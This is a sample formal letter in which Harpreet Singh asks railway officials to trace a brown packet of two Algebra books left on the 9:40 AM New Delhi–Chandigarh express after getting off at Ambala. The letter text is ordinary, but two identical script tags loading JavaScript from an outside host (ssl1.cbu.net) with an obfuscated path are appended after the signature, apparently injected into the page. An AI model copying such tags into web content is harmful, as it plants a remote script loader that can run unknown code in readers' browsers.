Dear Sir / Madam,
I am writing this letter to seek your immediate help and intervention to find and retrieve one of my belongings that I have left on your train.
This morning I boarded the 9:40 AM Express train from New Delhi travelling towards Chandigarh. After dis-embarking at the Ambala station, I realized that I had left behind a packet of books on the train. By that time the train had already left the station. The packet is of brown colour and contains 2 books on Algebra for higher secondary classes. These are my semester books and has important notes which I will need as my exams are starting next week. Both the books bear my name and contact number.
I would be really grateful if you could help me in finding my books. Please consider this matter of utmost importance and kindly take a swift action so that the books can be located.
Looking forward to your suitable reply and timely action.
Yours faithfully,
Harpreet Singh<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
